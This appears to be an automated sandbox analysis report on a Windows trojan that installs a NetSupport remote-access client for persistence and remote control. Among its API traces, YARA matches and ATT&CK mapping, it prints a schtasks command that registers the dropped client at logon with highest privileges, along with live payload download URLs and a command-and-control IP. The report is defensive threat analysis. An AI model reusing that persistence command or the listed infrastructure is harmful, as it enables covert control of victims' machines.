Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116A469
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_11030A50

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe		4_2_1102FB50
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe		6_2_1102FB50

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,

4_2_110F21E0

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_00191A80 GetProcessHeap,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,GetProcessHeap,GetProcessHeap,HeapAlloc,GetSystemDirectoryW,HeapFree,GetProcessHeap,HeapAlloc,wsprintfW,GetProcessHeap,HeapAlloc,HeapFree,wsprintfW,ShellExecuteW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00191A80

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,

4_2_1110F530

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST

Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

4_2_1109D240

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

4_2_1109D9C0

Source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Progman
Source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	Binary or memory string: Progman<

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_00197B48 cpuid

0_2_00197B48

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_111700E5
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_11170376
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_11170419
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoA,	4_2_11167A6E
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_1116FFE3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_1116FEEE
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_1117008A
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_111703DD
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_111702B6
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_6C3FDC56
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoA,	4_2_6C3FDC99
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6C3F1CC1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_6C3F1DB6
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_6C3F1E5D
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_6C3F1EB8
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_6C3F0F39
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	4_2_6C3EFAE1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	4_2_6C3FDB7C
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	4_2_6C3F1680
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_6C3F2089
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_6C3F2175
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: EnumSystemLocalesA,	4_2_6C3F2151
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_6C3F21DC
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_6C3F2218
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_6C3F1257
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_6C3F02AD
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	4_2_6C61888A
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	4_2_6C618468
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	4_2_6C6165F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	4_2_6C6185AC
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	4_2_6C61871C
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11170419
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoA,	6_2_11167A6E
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_1116FFE3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1116FEEE
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_1117008A
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_111700E5
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11170376
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_111703DD
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_111702B6

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

4_2_110F1070

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Code function: 0_2_00197771 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00197771

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,

4_2_1103B170

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_2_11171199

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

4_2_1109D240

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	4_2_1106F200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	4_2_110D5D90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	4_2_6C3CA980
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_1106F200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110D5D90

Source: Yara match	File source: 6.2.client32.exe.6c6f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.6c6f0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.6c6d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.lFxGd66yDa.exe.b7f5f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.lFxGd66yDa.exe.b7f5f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.6c6d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.6c3c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2217114600.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lFxGd66yDa.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 1548, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	14 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Windows Service	2 Valid Accounts	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 Software Packing	NTDS	44 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	Network Logon Script	1 Windows Service	1 Timestomp	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	23 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	23 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lFxGd66yDa.exe	63%	ReversingLabs	Win32.Trojan.Madokwa
lFxGd66yDa.exe	100%	Avira	HEUR/AGEN.1320053

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\DNScache\AudioCapture.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL	3%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL	3%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\PCICL32.DLL	17%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL	3%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\client32.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\msauserext.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\mscat32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\msvcr100.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\neth.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\netmsg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\pcicapi.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\DNScache\remcmdstub.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
https://cycleconf.com/dwnld/2nd2_4.zip	100%	Avira URL Cloud	phishing
https://cycleconf.com/J	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_1.zipt	0%	Avira URL Cloud	safe
https://cycleconf.com/4	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_2.zipr	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_4.zipW	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_2.zip(	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_2.zipz	0%	Avira URL Cloud	safe
http://88.210.12.58/fakeurl.htm	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_1.zipU	0%	Avira URL Cloud	safe
https://cycleconf.com/$6N	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_3.zipcache	0%	Avira URL Cloud	safe
http://127.0.0.1	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_3.zip=	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_4.zipr	0%	Avira URL Cloud	safe
http://www.crossteccorp.com	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_1.zip	100%	Avira URL Cloud	phishing
https://cycleconf.com/dwnld/2nd2_2.zip	100%	Avira URL Cloud	phishing
https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_3.zipnd2_2.zip	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_4.zipcache	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_2.zipX	0%	Avira URL Cloud	safe
https://cycleconf.com/	0%	Avira URL Cloud	safe
https://cycleconf.com/dwnld/2nd2_3.zip	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false	high
ganeres1.com	88.210.12.58	true	true	unknown
cycleconf.com	23.254.224.41	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		high
https://cycleconf.com/dwnld/2nd2_4.zip	false	Avira URL Cloud: phishing	unknown
http://88.210.12.58/fakeurl.htm	true	Avira URL Cloud: safe	unknown
https://cycleconf.com/dwnld/2nd2_1.zip	false	Avira URL Cloud: phishing	unknown
https://cycleconf.com/dwnld/2nd2_2.zip	false	Avira URL Cloud: phishing	unknown
https://cycleconf.com/dwnld/2nd2_3.zip	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr	false		high
